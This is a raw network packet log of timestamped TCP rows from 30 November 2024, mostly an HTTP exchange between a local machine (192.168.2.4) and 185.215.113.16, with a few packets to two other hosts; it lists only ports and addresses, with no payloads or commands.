Nov 30, 2024 04:06:36.173410892 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.174629927 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.174715042 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.174746990 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.174786091 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.176007986 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.176057100 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.176117897 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.176239967 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.177356958 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.177398920 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.177474976 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.177514076 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.178740025 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.178781033 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.178837061 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.178872108 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.180110931 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.180155993 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.180221081 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.180259943 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.181454897 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.181539059 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.181582928 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.182837009 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.182950020 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.182993889 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.184196949 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.184247971 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.184292078 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.184329033 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.185575008 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.185636044 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.185676098 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.185717106 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.186934948 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.187041044 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.187074900 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.187088013 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.188301086 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.188414097 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.188461065 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.189671040 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.189713001 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.189740896 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.189793110 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.207731962 CET	49816	80	192.168.2.4	185.215.113.206
Nov 30, 2024 04:06:36.316500902 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.316553116 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.316618919 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.316663027 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.317008972 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.317060947 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.317091942 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.317137957 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.317982912 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.318027020 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.318089962 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.318135023 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.318998098 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.319040060 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.319206953 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.319250107 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.320035934 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.320132017 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.320177078 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.321089983 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.321146011 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.321203947 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.322099924 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.322149038 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.322201967 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.322609901 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.323117018 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.323230982 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.323281050 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.324162006 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.324278116 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.324326992 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.325207949 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.325258970 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.325318098 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.325362921 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.326217890 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.326280117 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.326313019 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.326354980 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.327265024 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.327316999 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.327372074 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.327490091 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.328288078 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.328326941 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.328366995 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.328404903 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.329304934 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.329412937 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.329459906 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.330347061 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.330394030 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.330435991 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.330477953 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.331373930 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.331418037 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.331487894 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.331525087 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.332444906 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.332489967 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.332611084 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.332653999 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.333427906 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.333481073 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.333542109 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.333585024 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.334455967 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.334573984 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.334611893 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.334649086 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.335510015 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.335557938 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.335597038 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.335644960 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.336520910 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.336574078 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.336637020 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.336682081 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.337553978 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.337605000 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.337658882 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.337701082 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.338603973 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.338699102 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.338747025 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.339611053 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.339741945 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.339782000 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.339826107 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.340656042 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.340699911 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.340764046 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.340806007 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.341672897 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.341831923 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.341881037 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.342695951 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.342780113 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.342843056 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.343743086 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.343797922 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.343944073 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.344790936 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.344840050 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.344994068 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.345824957 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.345873117 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.345947981 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.345992088 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.346827984 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.346872091 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.346987963 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.347033024 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.347879887 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.347930908 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.347995996 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.348036051 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.348933935 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.348982096 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.349060059 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.349107027 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.349906921 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.349950075 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.350024939 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.350060940 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.350965023 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.351066113 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.351106882 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.351989985 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.352035046 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.352086067 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.352200031 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.353180885 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.353221893 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.353291035 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.353333950 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.354057074 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.354103088 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.354157925 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.354199886 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.355061054 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.355103016 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.355168104 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.355206966 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.356091976 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.356193066 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.356241941 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.357146025 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.357198000 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.357238054 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.358160019 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.358207941 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.358242989 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.358496904 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.359178066 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.359229088 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.359286070 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.359333992 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.360225916 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.360253096 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.360263109 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.360290051 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.361253977 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.361355066 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.361403942 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.362317085 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.362360954 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.362401009 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.362443924 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.363320112 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.363377094 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.363415956 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.363464117 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.364350080 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.364432096 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.364481926 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.365390062 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.365495920 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.365545034 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.366395950 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.366446018 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.366498947 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.366604090 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.367435932 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.367476940 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.367537022 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.368415117 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.368454933 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.368500948 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.368551016 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.368593931 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.369483948 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.369524956 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.369596958 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.369638920 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.370455027 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.370605946 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.450894117 CET	49828	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:36.450918913 CET	443	49828	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:36.451018095 CET	49828	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:36.451287031 CET	49828	443	192.168.2.4	104.21.16.9
Nov 30, 2024 04:06:36.451301098 CET	443	49828	104.21.16.9	192.168.2.4
Nov 30, 2024 04:06:36.517570019 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.517637968 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.517724991 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.517771959 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.518089056 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.518134117 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.518243074 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.518285990 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.519117117 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.519161940 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.519218922 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.519263983 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.520128965 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.520174980 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.520248890 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.520291090 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.521168947 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.521212101 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.521275997 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.521318913 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.522186041 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.522228956 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.522308111 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.522349119 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.523215055 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.523260117 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.523339987 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.523381948 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.524260998 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.524303913 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.524379015 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.524420977 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.525285006 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.525329113 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.525398016 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.525439978 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.526309013 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.526354074 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.526412010 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.526458979 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.527354956 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.527395010 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.527484894 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.527527094 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.528388977 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.528431892 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.528498888 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.528541088 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.529412031 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.529455900 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.529522896 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.529565096 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.530446053 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.530488014 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.530545950 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.530587912 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.531456947 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.531500101 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.531572104 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.531614065 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.532505035 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.532547951 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.532623053 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.532668114 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.533543110 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.533587933 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.533663988 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.533708096 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.534569025 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.534612894 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.534678936 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.534719944 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.535610914 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.535655975 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.535716057 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.535762072 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.536643028 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.536685944 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.536756992 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.536798954 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.537653923 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.537695885 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.537775040 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.537817955 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.538666964 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.538711071 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.538836956 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.538880110 CET	49822	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:36.539699078 CET	80	49822	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:36.539745092 CET	49822	80	192.168.2.4	185.215.113.16
